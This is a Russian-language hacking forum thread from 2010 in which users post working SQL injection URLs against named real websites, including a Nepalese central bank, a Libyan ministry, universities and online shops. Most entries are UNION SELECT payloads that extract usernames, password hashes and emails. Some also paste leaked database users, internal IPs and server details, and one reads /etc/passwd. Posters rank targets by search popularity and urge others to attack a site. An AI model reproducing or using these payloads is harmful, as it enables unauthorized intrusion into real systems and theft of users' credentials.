http://ndl-global.com/print.php?news=-92+union+select+1,2,concat%28user_login,0x3a,user_ pass%29,4,5+from+uw_users--
С админкой тоже самое, один и тотже сервак
Code:
http://www.rosconcert.com/common/arc/story.php?id_cr=-56+UNION+SELECT+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29%20from%20users--&id=19929
Username: russia@192.168.11.109
Version: 5.0.77
Database: cmn
Google PR:4 Тиц:350
Баян конечно, но чтото можно вытащить нужное.
Code:
http://www.fc-dynamospb.ru/list.php?id=-15+UNION+SELECT+1,2,3,cast%28concat%28table_name,0 x3a,column_name%29%20as%20binary%29+from+informati on_schema.columns--
запрос к базе:
from newusers_2
Joomla! 1.5 - Open Source Content Management
Code:
http://www.ijoomla.com/index.php?option=com_ijoomla_archive&act=getall&task=archive&ptitle=iJoomla%20Magazine§ionid=-4+UNION+SELECT+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29--
Username: ijoomla_udevxt@localhost
Version: 5.0.91-community
Database: ijoomla_dijooverx
Google PR: 7
http://www.burs.org.bw/index.php?option=com_vat&id=-38+union+select+1,2,3,4,5,6,7,group_concat(usernam e,char(58),password),9,10,11+from+jos_users
DezMond™
01.08.2010, 21:29
Центрального банка Непала
Центрального банка Непала
nrb.org.np
Code:
http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,username,pass word,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45+from+user_valid ate+limit+4,1+--+
http://nrb.org.np/login/login.php
.....
Konqi : пассы нельзя выложить
http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,bank_code,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45+from+lcuseraccounts+--+
ТИЦ: 50 PR: 6
Департамент труда и профессиональной подготовки Ливии
MSSQL
Code:
http://www.smpt.gov.ly/ViewNews.aspx?id=-221+union+all+select+'1',username,'3',password,'5' ,'6',null,'8','9'+from+users#
PR - 5
пароли очень старательно придумывали
ТИЦ 80 PR 7
http://www.nativeweb.org/resources.php?type=1+union+select+1,2,concat_ws(0x 3a, password,loginname),4,5, 6,7+from+users--
<Cyber-punk>
02.08.2010, 16:03
PR 3/10
ТИЦ 10
http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,version%28%29,User%28%29,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,2 6,27,28,29,30,31,32,33,34,35 ,36,37,38+--+
-=Zhenek=-
03.08.2010, 10:06
https://stat.net.kht.ru/result/stat.pl?action=calc&stat_login=***'+order+by+1--
'PostgreSQL 8.1.21 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.6:ViewUser:kray'
Может у кого и не откроется т.к это сайт статистики компании Дальсвязь
Я дальше копать не буду=)
Завтра напишу им о ошибке т.к наследил в логах как слон(((
<Cyber-punk>
03.08.2010, 11:19
PR - 1
Code:
http://realmebel63.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://ulma-c.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.euro-com.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://cleanwin.org/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://classtv.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.sentimat.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
PR - 2
Code:
http://alvitek.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
PR - 3
Code:
http://gsdk9.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.medvedi-pc.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
-PRIVAT-
03.08.2010, 11:50
http://www.auto-tambov.ru/auto-internet-magazin.php?id=-15-1+union+select+1,2,3,4,5,table_name,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tabl es+limit+29,1--
ТИЦ10YC(R2) PR3
http://www.line.com.ua/magazin.php?id=-9-1+union+select+1,table_name,3+from+information_sch ema.tables+limit+30,1 --
ТИЦ10(R2)
Боян
ТИЦ 200
http://webnata.ru/blog/more.php?article=-26-1+union+select+1,2,3,4,5,6,7,8,9%20--
http://www.prodazhadvd.com/catalog/store/more.php?id=-5305-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3%20--
http://www.russian-stories.com/more.php?mode=full&id=-96+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6%20--
PR1
Боян
ТИЦ10(R2) PR1
http://osloboda.ru/!objekt/more.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4 --
PR1
http://www.zavesa.info/more.php?id=-1093+union+select+1%20--
http://arosa.am/more.php?lang=1&id=18+union+select+1,2,3,4,5%20--
PR3
http://oborudinfo.com/more.php?id=669+union+select+1,2,3,4,5,6,7,8,9,10% 20--
Боян
PR2
http://www.bim.kr.ua/more.php?id=-37-1+union+select+1,2,3,4,5,6 --
PR2
http://www.tfx.ru/more.php?id=-214+union+select+1,2,3,4,5%20--
http://www.tortuga96.ru/more.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1%20--
http://znak.kr.ua/more.php?id=-9+union+select+1,2,3,4%20--
http://www.rusdolgnadzor.ru/sectors/more.php?id=-7+union+select+1,table_Name,3+from+information_sch ema.tables+limit+42,1%20--
ТИЦ30(R3) PR3 AR9439063
http://www.radexpro.ru/more.php?id=-3+union+select+1,2,3,4,5,group_concat%28column_nam e%29,7,8+from+information_schema.columns+where+tab le_name=0x70687062625F7573657273%20--
ТИЦ10(R2) PR4
http://www.illustratorsgallery.biz/illustrator/more.php?ID=-689+union+select+1,2,3,4,5,6,7,8 --
PR2
Боян
http://www.usadiba.ru/dom.php?id=-481+union+select+1,2,3,4,5,6,7,8 --
ТИЦ10(R2) PR2 AR19886775
проверьте скули антибоян-oм прежде чем постить, это касается всех!
daniel_1024
03.08.2010, 15:58
Code:
http://www.parfyme.ru/index.php?id=158+and+1=0+union+select+unhex(hex(ve rsion()))--
PR: N/A ТИЦ: 0
Database Version: 5.0.89-Max-log
Database name: srv13147_sql1
User name: srv13147_diman@c11-w.ht-systems.ru
OC type: unknown-linux-gnu
Code:
http://www.parkiet.bialystok.pl/page_edit_product.php?ID=64&kategoriaID=1&podkategoriaId=1509+and+1=0+union+select+version() ,2,3,4,5,6,7,8,9,10--
PR: 2 ТИЦ: 0
Database Version: 5.0.90-log
Database name: baza14270
User name: admin14270@85.128.140.40
OC type: unknown-linux-gnu
Code:
http://yaroslavl.ecologyandculture.ru/index.php?id=5+and+1=0+union+select+version()--
PR: 5 ТИЦ: 40
Database Version: 5.0.26-log
Database name: ecologyand_voron
User name: ecologyand_voron@localhost
OC type: pc-linux-gnu
Code:
http://raportowanie.pl/mainen/main.php?id=5009+and+1=0+union+select+1,2,3,4,vers ion(),6,7,8,9,10,11,12,13,14--
PR: 3 ТИЦ: 0
Database Version: 5.0.32-Debian_7etch12-log
Database name: mineralmidrange
User name: mineralmidrange@www-1.srv.noria.pl
OC type: pc-linux-gnu
Code:
http://www.nagazetnom.ru/index.php?id=20+and+1=0+union+select+version()--
PR: N/A ТИЦ: 50
Database Version: 5.0.24-standard
Database name: db_nagazetnom1
User name: nagazetnom1@localhost
Тиц 10
pr 3
http://housefan.de/videos.php?acc=Housefan.de&vid=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19&vkey=09f950750fd565dadeeeb&action=showvid
5.0.32-Debian_7etch12-log:housefan:housefan@localhostc-linux-gnu
http://www.aeheralds.net/rolls/Groups.php?id=-1+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),%20@@ve rsion_compile_os,version()),5,6,7,8,9,10--
Crown Principality of aeherald_aeheral@localhostc-linux-gnu:5.0.91-community
http://www.chinesecj.com/faq/faq.php?id=-2+UnIon+selECt+1,concat_ws(0x3a,user(),database(), version()),3,4+--+
chinesec_cjuser@localhost:chinesec_cj:5.0.91-community
pr5
http://rekguitars.com/english.php?site=dir&nr=-2+union+select+1,@@version_comment,@@datadir,@@tmp dir,@@version,user(),database(),@@version_compile_ os,@@version_compile_machine,@@warning_count,@@sys tem_time_zone,@@query_cache_size,13,14,15,16,17,18
moodoone
04.08.2010, 17:55
Code:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,5,6,7--
Code:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,concat(username,char(58 ),user_password),6,7+from+phpbb_users--
PR: 3
ТИЦ: 10
CyberHunter
04.08.2010, 17:57
http://www.mundocapoeira.ru/index.php?area=news&id=-176+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4--+
5.0.32-Debian_7etch12-log:capoeira_site:capoeira@localhost
http://www.kupitam.by/catalog.php?id=173+and+1=0+union+select+1,2,3,4,5, 6,7,8,concat(username,char(58),user_password),10,1 1,12,13,14,15,16,17,18,19,20+from+phpbbnew_users--
ПР 5
ТИЦ 750
Code:
http://www.tatarstan.net/index.phtml?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6+--
tatarstan@localhost:tatarstan:5.0.90
expressindia.com
PR - 8
уязвимость на уже не существующем проекте community.expressindia.com:
Code:
http://community.expressindia.com/myindia/message_popup.php?postId=-42612+union+select+null,null,name||chr(58)||passwo rd||chr(58)||email+from+mboard_user+limit+1+offset +0--+
некоторое пароли подходят и для главной странички ;-)
sql inj присутствует также в интернет-магазине, хостящемся на expressindia.com:
доступа к pg_shadow нет, но кое-что полезное можно извлечь... к примеру пароли продавцов магазина (формате base64, как я понимаю)
Code:
http://shopping.expressindia.com/index.php?page=listing&catId=-650+union+select+null,name||chr(58)||password||chr (58)||email,null,null,null,null,null,null+from+sel ler--+
db - PostgreSQL
вообще на сайте, как мне показалось, есть еще не мало дырок... если кто-нибудь захочет докрутить - u r welcome
http://www.ratlankiai.lt/product.php?&lng=lt&pid=-724+union+select+1,2,3,4
---
магазин
http://www.dinitrol.lt/straipsnis.php?id=10+union+select+1,2,aes_decrypt( aes_encrypt(concat_ws(0x3a,version(),@@version_com pile_os,@@version_compile_machine,@@version_commen t),1),1),4,5
PR 2
Code:
http://www.kappaargentina.com.ar/seccion2.php?id=-1+union+select+concat_ws%280x3a,database%28%29,use r%28%29,version%28%29%29%20--
uv5019_kappa:uv5019@us30.toservers.com:4.1.14-log
ТИЦ 20
PR 3
Shop
Code:
http://www.top7.ru/shop/buy/guides/?id=-1+union+select+1,concat_ws%280x3a,database%28%29,u ser%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35%20--
top7:root@localhost:5.4.1-beta
www.stroyposad.ru - Стройсервис. Строительная группа
Яндекс тИЦ: 10
Google PageRank: 2
Code:
http://www.stroyposad.ru/news/newfir.php?new_id=57+UNION+SELECT+1,2,3,CONCAT_WS( CHAR(32,58,32),user(),database(),version()),5,6,7--
u14919@10.8.0.26 : u14919 : 5.0.90-log
-PRIVAT-
05.08.2010, 16:05
http://www.unimak.ee/klient.php?id=-107+union+select+1,2--+
PR3
http://www.zemsta-jest-slodka.pl/poortal/klient.php?id=22+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
PR2
http://www.zahorie.com/klient.php?id=-279+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+--+
PR3
http://volleynet.dk/klient/nyheder-klient.php?id=85+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0%20+--+
PR4
http://www.suisunrcd.org/permit.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
PR4
http://invest-market.kz/deposit/bank.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9--
ТИЦ 30 PR1
Invest-Market.kz: заработать и сохранить деньги, паевые фонды (пиф), пенсионные фонды (нпф), депозиты (банки), финансовая консультация, школа инвестора, доходность, рейтинг, инвестиции, капитал
http://www.goldenroast.com.au/restaurant.php?id=-44+union+select+1,2,3,4,5,6,7%20+--+
ТИЦ 10 PR3
http://www.towerclub.com.ph/restaurant.php?id=-1+union+select+1,table_name,3,4,5,6%20FROM%20INFOR MATION_SCHEMA.TABLES+limit+0,1%20--
PR4
http://www.purplemobilephones.co.uk/tariff.php?id=-3400232+union+select+1,2,3,4,5,concat_ws%280x3a,id ,user,pass%29,7,8,9,0,1,2,3,4,5,6,7+from+admin%20--
PR4
[Feldmarschall]
06.08.2010, 00:03
Code:
http://www.epi.ch/page.php?pages_id=-9'+union+select+concat(version()),2,3,4,5,6 and '1'='1
Version: 5.0.87-d10-ourdelta65-log
User: epi@localhost
Database: epi
http://www.pivot-point.edu.au/content.php?id=-19'+union+select+1,2,3,4,5,concat_ws(0x3a,user(),d atabase(),version()),7,8,9,10,11,12,13,14,15,16/*
piv-point@localhostiv_point1:4.1.22
http://telnikfest.ru/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
http://xpffb.com/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
http://antidarvin.com/modules/galleri/viewcat.php?id=6&cid=-1+union+select+1,user()
http://www.odinochestvo-v-seti.ru/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
moodoone
06.08.2010, 14:36
Code:
http://www.comprousa.com/en/news_view.php?id=-8+union+select+1,group_concat(table_name),3,4+from +information_schema.tables--
Pr: 4
Тиц: 275
Code:
http://www.paintballxxl.com/news_view.php?id=-1202+union+select+1,2,3,4,concat_ws(0x3a,login,pas s),6+from+user+limit+1,1--
Pr: 3
Тиц: 130
Code:
http://www.ettu.org/news_view.php?id=-2443+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16--
Pr: 6
Тиц: 190
-PRIVAT-
06.08.2010, 15:15
http://www.pihenes.com/apro/page_print.php?id=-1510+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2 --
PR4
http://dront.net/uru/page_print.php?id=-623+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1--
PR1
http://www.marijvanoverbeek.nl/page_print.php?id=6+union+select+1,2,3,4,5,6,7%20--
PR2
http://www.mesta-vstrech.ru/mesto.php?id=-255+union+select+1,2,3,4,5,6,group_concat%28table_ name%29,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6+from+information_schema.tables--
ТИЦ 20 PR2
moodoone
06.08.2010, 15:55
Code:
http://www.profcosmetology.ru/preview.php?id=-759+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,gro up_concat(column_name),15,16,17,18,19,20,21,22,23, 24+from+information_schema.columns+where+table_nam e=0x74625F75736572--
Таблица: tb_user
PR: 3
ТИЦ: 30
Code:
http://www.invibio.com/press-room/releases-preview.php?id=-74+union+select+1,2,3,group_concat(table_name),5,6 ,7,8,9,10+from+information_schema.tables--
PR: 5
Code:
http://www.dvdfuture.com/review.php?id=-805+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--
PR: 4
ТИЦ: 10
Code:
http://www.jaxmovies.com/review.php?id=-71+union+select+1,2,version(),4,5,6,7,8,9,10,11--
PR: 3
ТИЦ: 10
Code:
http://orthodoxyinamerica.org/article.php?id=-25+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8--
PR-5
ТИЦ-10
Code:
http://www.saveoureverglades.org/article.php?id=-16+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53+--+
PR-5
Code:
http://www.zvyazda.minsk.by/ru/issue/article.php?id=-60634+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20--
PR: 6
ТИЦ: 550
Konqi : сколько можно повторять? проверьте антибоян-oм!!
Есть такой сайтик в питере, оказывает услуги рентгена на дому, так вот как оказалось кидалы, кидают пенсионеров и прочий народ, рентген нихера не делают, подсовывают левые снимки, стоит услуга 4000р. По телику их сайтик мельком показали в новостях, тут подробнее (http://spb.kp.ru/daily/24535.4/678745/)
Сам сайт дырявый, у кого есть навыки и желание, накажите.
Code:
http://www.vrachnadomu.ru/?page=main&lang=rus&id=59999+union+select+1,2,version(),4,5,6,7,8,9--
PR 5
Code:
http://digilib.its.ac.id/detil.php?id=-5719+UnIon+selECt+version%28%29,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47+--+
5.0.51a-24+lenny2
P.S Что-то там с оплатой связано...То ли шоп то ли оплата за отель хз в общем.
http://www.flacso.org.ec/html/program.php?id_programa=-1003+union+select+1,aes_decrypt(aes_encrypt(load_f ile('/etc/passwd'),1),1),3,4,5,6&ID=DC_0
File_priv = Y
mq = Off
PR-6
PR 5
Code:
http://www.citizenworks.org/news/index.php?id=-112+union+select+1,2,concat_ws(0x3a,version(),user (),@@version_compile_os),4+--+
4.0.27-log:xcitizenworks@sonic.futurequest.netc-linux-gnu
Code:
http://www.citizenworks.org/news/index.php?id=-112+union+select+1,2,group_concat(user_name,0x3a,p assword),4+from+user--+
-PRIVAT-
07.08.2010, 16:56
http://www.aviafond.ru/partner.php?id=-22+union+select+1,2,user%28%29,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5%20--
ТИЦ 160 PR 4
http://www.rifinfo.ru/print_news.php?id=-13424+union+select+1,2,3,4,4,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 %20+--+
ТИЦ 190 PR 3
http://www.accessexperts.net/show_news.php?id=-79+union+select+1,2,3,4,5,6 --
PR 3
http://www.wpb.org/park/park.php?id=58+union+select+1%20+--+
ТИЦ 10 PR 5
http://www.gbca.com/employment/job.php?id=-508+union+select+1,2,3,4,5,6,7,8,9,0,1--
PR 4
shop
http://www.odysea.com/shop/product.php?id=-15+++union+select+++1,2,3,4,5,6,version() ,8,9,10,11,12,13,14,15,16,17,18,19--
database: odys0001
[Feldmarschall]
08.08.2010, 05:38
online shop
Code:
https://www.canyonsports.com/shop/search.asp?q=ID')+OR+1=(select+top+1+table_name+fr om+information_schema.tables)--
MSSQL Version:
Code:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
181 баз
Code:
https://www.canyonsports.com/shop/search.asp?q=ID')+OR+1=(select+db_name(181)--
PR 4
Code:
http://hydro4africa.info/news/viewnews.php?ID=-452+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 2
Code:
http://wind4africa.info/news/viewnews.php?ID=-282+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 4
Code:
http://biomass4africa.net/news/viewnews.php?ID=-539+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 3
Code:
http://solar4africa.net/news/viewnews.php?ID=-533+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 4
Code:
http://www.bswy.us/whatNew.php?id=-34+union+select+1,2,concat_ws(0x3a3a,version(),use r(),@@version_compile_os),4,5,6--+
5.1.39-log::beringia@store.dollen.com:c-linux-gnu
PR 5
http://риэл-авто.рф/viewcars.php?carid=779 and 1=2 union select 1,2,3,concat_ws(0x3a,user(),database(),version()), 5,6,7,8,9,10 -- 1
rielautoru@192.168.2.223:rielautorudb:4.1.22-log
http://www.tijuana.gob.mx/transparencia/VerRespuestaTransparencia.asp?f=(select+top+1+@@ve rsion%2Bdb_name()+table_name+from+information_sche ma.columns)
http://www.shomershabes.com/service/eng.asp?es=122&eh=&eh2=&nh=0&nh2=0&p=Ukraine&cid=-120+union+all+select+1,cast(table_name+as+text)+fr om+information_schema.columns--
PR 3
Code:
http://www.competitionclutch.com/products/index.php?id=-1100+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x2b,v ersion(),user(),@@version_compile_os),10,11,12+--+
5.0.91-log+competition@97.74.24.204+unknown-linux-gnu
PR 5
Code:
http://www.cfijerusalem.net/index.php?id=-6.0+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x2b, version(),user(),@@version_compile_os),11+--+
5.0.81-log+dbo246170887@74.208.16.204+pc-linux-gnu
PR 5
Code:
http://www.newenglandapples.org/index.php?id=-35+union+select+concat_ws(0x2b,version(),user(),@@ version_compile_os)+--+
4.1.20+appleadmin@localhost+redhat-linux-gnu
Code:
http://www.nashcc.edu/index.php?option=com_remository&Itemid=248&func=startdown&id=299+or+1+group+by+concat((SELECT+password+from+ mos_users+limit+0,1),rand(0)|0)+having+avg(0)+--+
pr 6
Налетай Ребята!
http://robgru.allhyper.com/webdesign/index.php?id=6+union+select+1,@@version_compile_os
-PRIVAT-
09.08.2010, 18:54
http://www.sovaco.com.vn/print_news.aspx?id=-344+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3+--+
PR 1
http://www.ghananewsmonthly.com/print_news.asp?id=1%20or%201=@@version--
PR 4
Microsoft OLE DB
http://www.oscebih.org/public/print_news.asp?id=66+or+1=@@version--
PR 7
Microsoft VBScript
http://www.bizghana.com/print_news.asp?id=377966+or+1=@@version--
Microsoft OLE DB
http://www.queens.edu/print_news.asp?press_id=1%20or%201=@@version
Microsoft VBScript
http://www.invacanzanelsalento.com/print_news.asp?id=-80+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
Microsoft OLE DB
http://www.effectgroep.nl/eventformats/print_news.asp?id=66+or+1=@@version--
Microsoft OLE DB
PR 3
http://www.hlv.de/News/print_news.asp?ID=416+or+1=@@version--
Microsoft OLE DB
PR 4
http://twitgift.ly/send-gift.php?id=-30+union+select+1,concat(id,char(58),twitterUserNa me),3,4,5+from+user
http://www.aljamahiria.com/nas.php?count=32&id_pages=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--
http://www.ecom.org.la/news.php?col=1&id=-2837+union+select+1,2,version(),4,5,6,7
Code:
http://afghanistan.ru/doc.xhtml?id=-3372+union+select+concat_ws(0x3a,username,passwd), 2,3,4,5,6,7,8,9,0,1+from+enter_users--+
Code:
http://afghanistan.ru/doc.xhtml?id=-3372+union+select+concat_ws(0x3a,nick,passwd),2,3, 4,5,6,7,8,9,0,1+from+f_users--+
тИЦ -750
moodoone
10.08.2010, 15:24
Code:
http://www.disguises.com.au/look.php?ID=-39+UnIon+selECt+1,version(),3,4,5,6+--+
PR:3
P.S. Вывод интересный)
stepashka_
10.08.2010, 16:29
Моя первая скуля..
http://www.zadvigka.ru/ind.php?pn=53&id_categ=-9+UNION+SeLeCt+1,2,3,4,5,concat_ws(0x3a3a,version( ),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1--+
тИЦ: 20
А вот и вторая..
http://bel-shop.com/doska7/ind.php?pn=8&id_typ=-39+UNION+SELECT+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+FROM%20INFORMAT ION_SCHEMA.TABLES--+
тИЦ: 80
Ну понеслось..
http://www.vip-doski.ru/ind.php?pn=0&id_typ=-126+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29+FROM%20INFORMATION_SCHEMA.TABLES--+
тИЦ: 20
http://www.infoboard.reporter-studio.ru/ind.php?pn=34&id_categ=-2+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+F ROM%20INFORMATION_SCHEMA.TABLES--+
тИЦ: 550
http://www.vip-doski.ru/ind.php?pn=0&id_typ=-16+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),user(%20),version()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29--+
sexsex_doska1:sexsex_doska@localhost:5.1.48
тИЦ: 20
Проклятые фрики
Гомосексуалисты.
http://www.get-it-gay.at/update/detail.php?nr=-1+union+select+concat_ws(0x3a3a,adv_uname,adv_pass ),2,3,4+from+getitgay_mod__user+limit+0,1--&rubric=Update&
PR 2
Code:
http://www.go4get.com/add_go4board.php?id=-808+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os),3,4,5,6,7,8,9,10+--+
5.0.22-log+niaawgo123_niaaw@localhost+unknown-freebsd6.0
PR 5
Massachusetts Institute of Technology
Code:
http://burgaz.mit.edu/getpaper.php?id=-273+union+select+concat_ws(0x2b,version(),user(),@ @version_compile_os),2,3--+
File /var/www/PUBLICATIONS/5.0.67-0ubuntu6+mysql@18.82.1.16+debian-linux-gnu not found or inaccessible!
http://liblive.ru/?id=-1+union+select+1,2,concat_ws(0x3a,database(),user( ),version()),4,5,6+--+
liblive:liblive@localhost:5.0.45-community-nt
SofiaLoar
11.08.2010, 22:50
http://www.spblove.ru/full_show.php?table=ankets&id=-1+union+select+1,concat_ws(0x3a,mail,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,version(),28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42+from+iankets+--
PR - 4
http://www.rwmartialcombat.com/popup-fighters.php?id=-52+UnION+SELeCT+1,group_concat%28username,0x3a,pas sword%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21+fRom+users%20--+
Мослаем...
pr4
http://www.cinefish.bg/programa_film.php?city=%CF%EB%EE%E2%E4%E8%E2&day=1&movie_id=-1+union+select+user()--
db user: cinefish@10.0.0.141
http://www.nevada211.org/sup.php?id=-5'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,version(),22,23,24,25,26,27--+
4 ветка
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
а так-же
http://www.koeln-stadt.de/cgi-bin/safe.pl?NAV=-1+union+select+1,2,3,4/*
Database Version: 4.0.27-standard
Database name: db179060028
User name: dbo179060028@localhost
5.1.45-0
Code:
http://www.riverhousemini.com/occasions/mini_sold.php?id_cartype=-3%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9 ,10,11,12,13,14,15,16,17,18,19
stepashka_
12.08.2010, 10:48
http://www.mirdosok.ru/ind.php?pn=1&id_typ=-191+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FR OM%20INFORMATION_SCHEMA.TABLES--+
5.0.87-percona-highperf-log : plaster@localhost
тИЦ: 10
http://doska.k-gb.ru/ind.php?pn=1&id_typ=-159+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),user(),version()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26--+
gena:root@localhost:5.0.45
тИЦ: 20
